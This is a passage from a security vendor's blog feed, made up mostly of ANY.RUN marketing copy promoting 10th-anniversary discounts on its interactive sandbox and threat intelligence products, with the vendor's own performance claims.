<p>This turns social engineering response into a repeatable process:&nbsp;observe&nbsp;the attack, enrich the context, document the findings, and act before exposure spreads.&nbsp;</p>



<h2 class="wp-block-heading">From Social Engineering Visibility to SOC Performance&nbsp;</h2>



<p>Closing social engineering blind spots is about reducing the operational drag these attacks create across the SOC: unclear alerts, manual validation, repeated handoffs, and delayed decisions.&nbsp;</p>



<p>ANY.RUN helps security teams improve that process with <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_term=190526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">interactive sandbox analysis</a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_term=190526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">threat intelligence solutions</a> working together in one investigation workflow.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-1024x576.png" alt="Boosting SOC performance with ANY.RUN’s sandbox analysis and threat intelligence solutions" class="wp-image-21051" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-1536x864.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-2048x1152.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-2-740x416.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Boosting SOC performance with ANY.RUN’s&nbsp;sandbox&nbsp;analysis and&nbsp;threat&nbsp;intelligence&nbsp;solutions</em></figcaption></figure></div>


<p>Organizations using ANY.RUN report:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>21 minutes faster MTTR per case</strong>, helping reduce the time between detection and containment&nbsp;</li>



<li><strong>94% faster triage reported by users</strong>&nbsp;during suspicious file, URL, and phishing investigations</li>



<li><strong>30% fewer Tier 1 to Tier 2 escalations</strong>, helping protect senior team capacity&nbsp;&nbsp;</li>



<li><strong>Up to 20% lower Tier 1 workload</strong>&nbsp;by reducing manual investigation effort&nbsp;</li>



<li><strong>Up to 3x stronger SOC efficiency</strong>&nbsp;across validation, enrichment, escalation, and response workflows&nbsp;</li>
</ul>



<p>These results show the practical value of closing social engineering blind spots: fewer delays, less wasted effort, and faster confidence when the business needs a clear answer.&nbsp;</p>



<h2 class="wp-block-heading">Get Special ANY.RUN Offers Before May 31</h2>



<p>To mark its 10th anniversary, ANY.RUN is offering special conditions for SOCs, MSSPs, and enterprise security teams that want to strengthen phishing analysis, threat intelligence, and response readiness.</p>



<p>Trusted by security teams worldwide, including 74 Fortune 100 companies, ANY.RUN helps organizations bring earlier threat visibility into the workflows where response decisions happen.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="538" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-1024x538.png" alt="special offer" class="wp-image-21120" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-1024x538.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-768x403.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-1536x806.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-2048x1075.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2-740x389.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Special offers by ANY.RUN for threat analysis and intelligence solutions</em></figcaption></figure></div>


<p>Until May 31, teams can access anniversary offers across key ANY.RUN solutions, including:</p>



<ul class="wp-block-list">
<li><strong>Interactive Sandbox</strong> to safely analyze suspicious links, files, emails, and phishing pages with behavior-based visibility, with bonus seats and exclusive pricing available for teams.</li>



<li><strong>Threat Intelligence solutions</strong> with extra months to help teams connect single cases to related infrastructure, IOCs, campaigns, and broader threat activity.</li>
</ul>



<p>This is a great opportunity to close social engineering blind spots, reduce gray-zone investigations, and give teams clearer evidence before trusted workflows turn into exposure.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Reduce the delay between detection and confident action. 
<br>
<span class="highlight">Get your ANY.RUN&#8217;s 10th anniversary special offer. </span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=social-engineering-attacks-2026&#038;utm_term=190526&#038;utm_content=linktosandboxpricing" rel="noopener" target="_blank">
Claim your special offer
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p>ANY.RUN delivers cybersecurity solutions built to support real-world SOC operations. Its platform helps security teams investigate&nbsp;threats faster, make informed decisions, and apply&nbsp;threat&nbsp;intelligence&nbsp;across detection, triage, response, and reporting workflows.&nbsp;</p>



<p>The company’s solutions include the&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_term=190526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>&nbsp;for enterprise-grade malware and phishing analysis, as well as ANY.RUN&nbsp;Threat&nbsp;Intelligence&nbsp;solutions, including&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_term=190526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>,&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_term=190526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a>, TI Reports, and YARA Search. Together, they provide fresh,&nbsp;behavior-based intelligence built on live attack analysis.&nbsp;</p>



<p>ANY.RUN is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_term=190526&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II</a>&nbsp;attested, reflecting strong security controls and a commitment to protecting customer data. For SOCs, MSSPs, and enterprise security teams, ANY.RUN helps reduce investigation uncertainty, improve triage speed, and turn complex&nbsp;threat&nbsp;activity into clear, actionable evidence.&nbsp;</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/social-engineering-attacks-2026/">Top 5 Phishing-Driven Social Engineering Attacks on Companies in 2026</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/social-engineering-attacks-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ANY.RUN Turns 10: Special Offers for Stronger Security Operations</title>
		<link>https://any.run/cybersecurity-blog/anyrun-10th-anniversary-offers/</link>
					<comments>https://any.run/cybersecurity-blog/anyrun-10th-anniversary-offers/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Mon, 18 May 2026 10:57:53 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20975</guid>

					<description><![CDATA[<p>Ten years in cybersecurity is a long journey. Threats have changed, attacks have become harder to spot, and security teams now need answers faster than ever.&#160; ANY.RUN&#160;has grown with those teams.&#160; What started as an interactive sandbox is now a trusted&#160;company with&#160;threat analysis and intelligence&#160;solution&#160;used by 15,000+ organizations, 600,000 security professionals, and teams at Fortune [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/anyrun-10th-anniversary-offers/">ANY.RUN Turns 10: Special Offers for Stronger Security Operations</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Ten years in cybersecurity is a long journey. Threats have changed, attacks have become harder to spot, and security teams now need answers faster than ever.&nbsp;</p>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;has grown with those teams.&nbsp;</p>



<p>What started as an interactive sandbox is now a trusted&nbsp;company with&nbsp;threat analysis and intelligence&nbsp;solution&nbsp;used by 15,000+ organizations, 600,000 security professionals, and teams at Fortune 100 companies worldwide.&nbsp;</p>



<p>For our 10th anniversary, we want to thank everyone who helped us get here: our users, customers, partners, and community.&nbsp;</p>



<p>To celebrate,&nbsp;we’re&nbsp;launching<strong>&nbsp;</strong><a href="https://app.any.run/plans?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktoplans" target="_blank" rel="noreferrer noopener">special offers&nbsp;across&nbsp;Interactive Sandbox&nbsp;and Threat Intelligence solutions</a>, including extra months, discounts, exclusive pricing, and more value for your team.&nbsp;</p>



<h2 class="wp-block-heading">Grab&nbsp;Your Anniversary Offer Until May 31&nbsp;</h2>



<p>From May 18 to May 31,&nbsp;we’re&nbsp;celebrating ANY.RUN’s 10th anniversary with&nbsp;special offers&nbsp;across our core threat analysis and intelligence solutions.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="538" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-1024x538.png" alt="Special offers available for your team " class="wp-image-20978" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-1024x538.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-768x403.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-1536x806.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-2048x1075.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Special-Offers-740x389.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Special offers available for your team</em></figcaption></figure></div>


<p>This year’s offers are available for&nbsp;Hunter,&nbsp;<a href="https://any.run/cybersecurity-blog/anyrun-enterprise-plan/" target="_blank" rel="noreferrer noopener">Enterprise&nbsp;Suite</a>, and Threat Intelligence&nbsp;solutions. Depending on your plan and team needs, you can get extra months,&nbsp;special discounts, exclusive pricing, or added value to support your security workflows.&nbsp;</p>



<p>Whether&nbsp;you’re&nbsp;an individual researcher, a SOC team, an MSSP, or an enterprise organization, this is a good moment to expand your access to ANY.RUN, improve threat visibility, and give your team more room to investigate,&nbsp;validate, and respond faster.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Claim more SOC value before May 31.</span><br>
Speed up triage, reduce workload, and strengthen response.</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=anyrun-10th-anniversary-offers&#038;utm_term=180526&#038;utm_content=linktoplans" rel="noopener" target="_blank">
Get your offer now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Interactive Sandbox Anniversary Offers&nbsp;</h2>



<p>ANY.RUN’s&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;helps security teams investigate suspicious files, links, phishing pages, and malware&nbsp;behavior&nbsp;in real time. Instead of relying only on static alerts or delayed reports, teams can safely open, interact with, and&nbsp;observe&nbsp;threats as they behave, giving them the evidence they need to act faster.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4-1024x576.png" alt="How to boost SOC efficiency of Tier 1/2/3 with Enterprise Suite" class="wp-image-20979" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4-1536x864.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4-740x416.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/2-4.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>How to boost SOC efficiency of Tier 1/2/3 with Enterprise Suite</em></figcaption></figure></div>


<ul class="wp-block-list">
<li><strong>For individual security professionals</strong>, the Hunter plan gives more privacy, flexibility, and access for everyday malware and phishing investigations.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>For SOCs&nbsp;and&nbsp;MSSPs</strong>, the Enterprise Suite brings interactive threat analysis into a secure team environment. It gives organizations private analysis, team collaboration,&nbsp;user&nbsp;and role management, SSO, access control, and shared visibility across investigations.&nbsp;</li>
</ul>



<p>This matters most in high-pressure security operations, where teams need to move from alert to decision quickly. Tier 1 specialists can open suspicious files, URLs, and phishing pages in a safe cloud environment,&nbsp;observe&nbsp;real&nbsp;behavior, collect IOCs, and decide whether a case needs escalation. Senior specialists get fewer low-confidence cases. SOC managers get clearer evidence for containment, reporting, and customer communication.&nbsp;</p>



<p>That is why more than&nbsp;<strong>1,700 MSSPs worldwide trust ANY.RUN</strong>&nbsp;to support malware analysis, phishing investigation, and faster threat validation across customer environments.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Strengthen SOC resilience with real-time threat analysis.</span><br>
Reduce escalations and respond with evidence. </p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=anyrun-10th-anniversary-offers&#038;utm_term=180526&#038;utm_content=linktoplans" rel="noopener" target="_blank">
Claim offer now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>The outcomes show up across the full SOC process:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>94% of users report faster triage</strong>, because they get clear&nbsp;behavior-based evidence early in the investigation&nbsp;</li>



<li><strong>Up to 20% decrease in Tier 1 workload</strong>, as routine malware and phishing checks become faster and easier to complete&nbsp;</li>



<li><strong>30% reduction in Tier 1 to Tier 2 escalations</strong>, because more cases can be&nbsp;validated&nbsp;before they reach senior specialists&nbsp;</li>



<li><strong>21-minute MTTR reduction per case</strong>, helping teams respond faster when a real threat is confirmed&nbsp;</li>



<li><strong>Lower infrastructure costs</strong>, since teams can use a secure cloud-based sandbox instead of&nbsp;maintaining&nbsp;local analysis environments&nbsp;</li>



<li><strong>Broader threat coverage</strong>, with one cloud-based environment for&nbsp;analyzing&nbsp;threats across Windows, macOS, Linux, and Android instead of relying on separate&nbsp;platforms&nbsp;or manual workarounds&nbsp;</li>



<li><strong>Less alert fatigue</strong>, with instant threat insights that help teams focus on real risk instead of chasing every suspicious signal&nbsp;</li>



<li><strong>Lower business&nbsp;risk</strong>, because&nbsp;earlier detection and better context support faster containment and more informed response&nbsp;</li>
</ul>



<p>For teams under pressure, this leads to a cleaner investigation process, better use of analyst time, stronger control over sensitive cases, and clearer evidence when decisions need to be made quickly.&nbsp;</p>



<p>During ANY.RUN’s 10th anniversary campaign, SOCs, MSSPs, enterprises, and individual security professionals can get access to these Interactive Sandbox capabilities with extra value,&nbsp;special discounts, exclusive pricing, or more flexible options.&nbsp;</p>



<p>Explore the Interactive Sandbox anniversary offers and give your team faster investigations, stronger privacy, and measurable SOC impact.&nbsp;</p>



<h2 class="wp-block-heading">Threat Intelligence Solutions Anniversary Offer&nbsp;</h2>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117-1024x576.png" alt="ANY.RUN’s Threat Intelligence helps teams to achieve rapid triage and response" class="wp-image-20980" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117-1536x864.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117-740x416.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/4117.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s Threat Intelligence helps teams to achieve rapid triage and response</em></figcaption></figure></div>


<p>Threat intelligence is most valuable when it helps teams move from an indicator to a decision faster.&nbsp;</p>



<p>ANY.RUN&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-10th-anniversary-offers&amp;utm_term=180526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>&nbsp;solutions give SOC and MSSP teams fresh,&nbsp;behavior-based context powered by live attack data from&nbsp;<strong>15,000 organizations and 600,000 security professionals</strong>&nbsp;worldwide. Instead of working with isolated IOCs, teams can connect indicators to related samples, infrastructure, attacker&nbsp;behavior, campaigns, and detection logic.&nbsp;</p>



<p>This helps teams improve the SOC processes where context matters most:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Faster triage:</strong>&nbsp;Validate&nbsp;suspicious hashes, IPs, domains, URLs, and other indicators with clear context on whether they are connected to malware, phishing activity, or active campaigns.&nbsp;</li>



<li><strong>More confident response:</strong>&nbsp;Move from one indicator to the full attack picture, including related infrastructure, artifacts,&nbsp;behavior, and connected threats that may also need containment.&nbsp;</li>



<li><strong>Evidence-driven threat hunting:</strong>&nbsp;Test hypotheses against real-world attack data, find related samples, and confirm whether suspicious patterns are relevant to the organization.&nbsp;</li>



<li><strong>Stronger detection engineering:</strong>&nbsp;Build and improve detection rules based on current malware and phishing&nbsp;behavior, not outdated or theoretical threat models.&nbsp;</li>



<li><strong>Clearer reporting:</strong>&nbsp;Give SOC leaders, MSSP customers, and internal teams stronger evidence behind investigation and response decisions.&nbsp;</li>
</ul>



<p>With TI Lookup, TI Feeds, TI Reports, and YARA Search, teams can bring threat intelligence directly into the places where SOC work usually slows down: alert validation, investigation, hunting, detection, and reporting.&nbsp;</p>



<p>Instead of checking one IOC at a time or jumping between disconnected tools, teams get fresh attack context in one workflow. They can&nbsp;validate&nbsp;suspicious indicators faster, understand related infrastructure, uncover connected samples, and see how an attack behaves in real environments.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Bring live attack context into your SOC. </span><br>
Validate threats faster and improve detection accuracy. </p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://intelligence.any.run/plans/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=anyrun-10th-anniversary-offers&#038;utm_term=180526&#038;utm_content=linktotiplans" rel="noopener" target="_blank">
Claim offer now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>For SOC and MSSP teams, this leads to practical outcomes:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Faster alert&nbsp;validation</strong>, because&nbsp;teams can check indicators against real-world attack data in seconds&nbsp;</li>



<li><strong>Fewer uncertainty-driven&nbsp;escalations,</strong>&nbsp;because&nbsp;Tier 1 teams get clearer context before passing cases to senior specialists&nbsp;</li>



<li><strong>Better incident scoping</strong>, as responders can connect one IOC to related infrastructure, artifacts,&nbsp;behavior, and campaigns&nbsp;</li>



<li><strong>Stronger threat hunting</strong>, with access to live malware and phishing data for testing hypotheses and finding related samples&nbsp;</li>



<li><strong>More&nbsp;accurate&nbsp;detections</strong>, since teams can build and improve rules based on current attack&nbsp;behavior&nbsp;</li>



<li><strong>Lower investigation time</strong>, because analysts spend less time switching between tools and more time acting on confirmed risk&nbsp;</li>



<li><strong>Stronger reporting</strong>, with evidence that is easier to explain to SOC leaders, customers, and internal teams&nbsp;</li>
</ul>



<p>Together, these outcomes help teams reduce noise, improve response accuracy, and use security resources where they matter most: on real threats with confirmed business risk.&nbsp;</p>



<p>During ANY.RUN’s 10th anniversary campaign, teams can access special value for Threat Intelligence solutions, including extra months and flexible options.</p>



<p>Explore the Threat Intelligence anniversary offer and bring fresh, actionable attack context into your SOC.&nbsp;</p>



<h2 class="wp-block-heading">Trusted by Teams That Work with Real Threats Every Day&nbsp;</h2>



<p>Ten years of ANY.RUN is also ten years of building for the people who use it in real investigations: SOC teams, MSSPs, enterprise security teams, researchers, and threat hunters.&nbsp;</p>



<p>Today, ANY.RUN supports the work security teams do every day:&nbsp;validating&nbsp;alerts, investigating suspicious activity, collecting evidence, escalating confirmed threats, and reporting outcomes clearly.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-1024x576.png" alt="How ANY.RUN solutions help accelerate SOC processes " class="wp-image-20982" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-1536x864.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-2048x1152.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Boost-SOC-Performance-and-Business-Security-1-740x416.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>How ANY.RUN solutions help accelerate SOC processes</em></figcaption></figure></div>


<p>For customers, the value is often felt in one simple change: less time lost to uncertainty.&nbsp;</p>



<p>As one&nbsp;<a href="https://any.run/cybersecurity-blog/fortune-500-enterprise-success-story/" target="_blank" rel="noreferrer noopener">Fortune 500 technology company</a>&nbsp;shared:&nbsp;“We just stopped losing time to uncertainty. Now we can confirm&nbsp;what’s&nbsp;happening faster and escalate only when it&nbsp;actually makes&nbsp;sense.”&nbsp;</p>



<p>For MSSPs, the value also shows up in reporting and customer communication. A&nbsp;<a href="https://any.run/cybersecurity-blog/healthcare-mssp-success-story/" target="_blank" rel="noreferrer noopener">healthcare MSSP</a>&nbsp;described the change this way:&nbsp;“Since we implemented new solutions, every investigation now comes with evidence and threat data, from MITRE tags to screenshots.”&nbsp;</p>



<p>This is what ANY.RUN continues to build for: faster decisions, clearer evidence, fewer unnecessary escalations, and security workflows that are easier to scale across teams and customers.&nbsp;</p>


<div class="wp-block-image">
